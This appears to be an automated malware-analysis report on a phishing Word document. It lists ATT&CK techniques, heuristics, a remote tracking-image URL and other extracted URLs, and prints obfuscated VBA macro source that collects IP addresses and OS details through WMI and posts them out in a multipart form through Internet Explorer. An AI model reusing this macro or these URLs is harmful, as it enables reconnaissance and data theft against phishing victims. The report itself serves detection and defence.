MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1204.002 Malicious File
The OOXML document contains VBA macros, indicated by the 'OOXML_VBA' heuristic. The script uses 'CreateObject' and 'GetObject' calls, suggesting it attempts to interact with the system or download external content. The presence of a remote image URL in the document's relationships and the VBA code's structure point towards a macro-based downloader. The document body presents a fake form, urging the user to 'Enable Content', a common social engineering tactic.
Heuristics 7
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Remote image (web beacon / tracking pixel) medium OOXML_IMAGE_BEACONDocument references an external image URL — loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
-
External relationship medium OOXML_EXTERNAL_RELExternal target in word/_rels/document.xml.rels: https://24ikamf3ld3rlmmg6h6xdn6av3m3n2dc.sso.ingos.su/static/image.png?user_rid=b2wqtxw25dq6qkuvuh75hoj5csumouwi
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://24ikamf3ld3rlmmg6h6xdn6av3m3n2dc.sso.ingos.su/static/image.png?user_rid=b2wqtxw25dq6qkuvuh75hoj5csumouwi OOXML external relationship
- https://post.ingos.su/035acff221d8cb7d882cc8e8a64169f482adb3cdfa6b7912In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/package/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-propertiesIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-propertiesIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocumentIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-propertiesIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5190 bytes |
SHA-256: 22f0950305fe309caf37145b0a0bcfda075234a6cbe6bfab1d795b959c0e012d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton"
Private Sub CommandButton1_Click()
MsgBox ("Ïðîèçîøëà îøèáêà.")
Module1.phxUC
End Sub
Attribute VB_Name = "Module1"
Function MoRwAl(Length As Integer)
Dim cyZfAYwgIIfFvIsATgJwiTdY As Variant
Dim JPdNU As Long
Dim fOTTnnWjFVt As String
cyZfAYwgIIfFvIsATgJwiTdY = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", _
"y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", _
"A", "B", "C", "D", "E", "F", "G", "H", _
"I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", _
"W", "X", "Y", "Z")
For JPdNU = 1 To Length
Randomize
fOTTnnWjFVt = fOTTnnWjFVt & cyZfAYwgIIfFvIsATgJwiTdY(Int((UBound(cyZfAYwgIIfFvIsATgJwiTdY) - LBound(cyZfAYwgIIfFvIsATgJwiTdY) + 1) * Rnd + LBound(cyZfAYwgIIfFvIsATgJwiTdY)))
Next JPdNU
MoRwAl = fOTTnnWjFVt
End Function
Function tDZSy() As String
Dim lkbYi As String
Dim nyUIrqdl As Object
Dim tHpbaCSZwbtwawWuUBFoJryI As Object
Dim HKajOgmuWKoQWMJvgfQJC As Object
Dim twWEGMifiAjaJPBvyTSc As String
Dim ZYMGcZyIK As Integer
lkbYi = "."
twWEGMifiAjaJPBvyTSc = ""
Set nyUIrqdl = GetObject("winmgmts:\\" & lkbYi & "\root\cimv2")
Set tHpbaCSZwbtwawWuUBFoJryI = nyUIrqdl.ExecQuery _
("Select * from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE")
For Each HKajOgmuWKoQWMJvgfQJC In tHpbaCSZwbtwawWuUBFoJryI
If Not IsNull(HKajOgmuWKoQWMJvgfQJC.IPAddress) Then
For ZYMGcZyIK = LBound(HKajOgmuWKoQWMJvgfQJC.IPAddress) To UBound(HKajOgmuWKoQWMJvgfQJC.IPAddress)
twWEGMifiAjaJPBvyTSc = twWEGMifiAjaJPBvyTSc & HKajOgmuWKoQWMJvgfQJC.IPAddress(ZYMGcZyIK) & " " & HKajOgmuWKoQWMJvgfQJC.Description(ZYMGcZyIK) & vbCrLf
Next
End If
Next
tDZSy = twWEGMifiAjaJPBvyTSc
End Function
Function CWiZQLNpdAQY() As String
Dim zxTFxoDfJgbnQyQpJIEtUfd As String
Dim PQXxhwIJVZcCOcNKyMRrwmpO As Object
Dim uBtVUmuNzC As Object
Dim VAklWhN As Object
Dim GXMsv As String
zxTFxoDfJgbnQyQpJIEtUfd = "."
GXMsv = ""
Set PQXxhwIJVZcCOcNKyMRrwmpO = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & zxTFxoDfJgbnQyQpJIEtUfd & "\root\cimv2")
Set uBtVUmuNzC = PQXxhwIJVZcCOcNKyMRrwmpO.ExecQuery("Select * from Win32_OperatingSystem")
For Each VAklWhN In uBtVUmuNzC
GXMsv = GXMsv & VAklWhN.Caption & " " & VAklWhN.Version & vbCrLf
Next
CWiZQLNpdAQY = GXMsv
End Function
Sub DQDAaDiPKwRESWiCI(JfoSKuANf As String, olGjMVgRkXODBJPZQhwv As String, gAvRlZFgn As String)
Dim WebBrowser: Set WebBrowser = CreateObject("InternetExplorer.Application")
Dim XZHaouZuPbyfqRWWaZNM() As Byte
ReDim XZHaouZuPbyfqRWWaZNM(Len(olGjMVgRkXODBJPZQhwv) - 1)
XZHaouZuPbyfqRWWaZNM = StrConv(olGjMVgRkXODBJPZQhwv, vbFromUnicode)
WebBrowser.Navigate JfoSKuANf, 2 + 4 + 8, , XZHaouZuPbyfqRWWaZNM, _
"Content-type: multipart/form-data; boundary=" + gAvRlZFgn + Chr(10) + Chr(13)
Do While WebBrowser.busy
DoEvents
Loop
WebBrowser.Quit
End Sub
Function pCnvrdistEp(vpaITyBBcRHDlWGGLNHTKinF As String, CtPjMmpKcDPobsHCyjvI As String, EgkQuHSMoxSYAml As String, nmfOQmboODoOModusSqV As String, bPppYAdTwBJWNywIegr As String, sthptmT As String, Optional ByVal bAsync As Boolean) As String
Dim uUNyb As String
uUNyb = "--" & vpaITyBBcRHDlWGGLNHTKinF & vbCrLf & _
"Content-Disposition: form-data; name=" & bPppYAdTwBJWNywIegr & "" & vbCrLf & vbCrLf & _
sthptmT & vbCrLf & _
"--" & vpaITyBBcRHDlWGGLNHTKinF & vbCrLf & _
"Content-Disposition: form-data; name=" & CtPjMmpKcDPobsHCyjvI & "" & vbCrLf & vbCrLf & _
nmfOQmboODoOModusSqV & vbCrLf & _
"--" & vpaITyBBcRHDlWGGLNHTKinF & "--"
DQDAaDiPKwRESWiCI EgkQuHSMoxSYAml, uUNyb, vpaITyBBcRHDlWGGLNHTKinF
End Function
Function NmXAAKfdkIGGRFhOW(os As String) As String
Dim yMKTmQMviBN As String
yMKTmQMviBN = Chr(10) & "User:" & E
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 36352 bytes |
SHA-256: 8c15345d566f56a544778923f925fca3217c187942de6cae1902b7e642822125 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.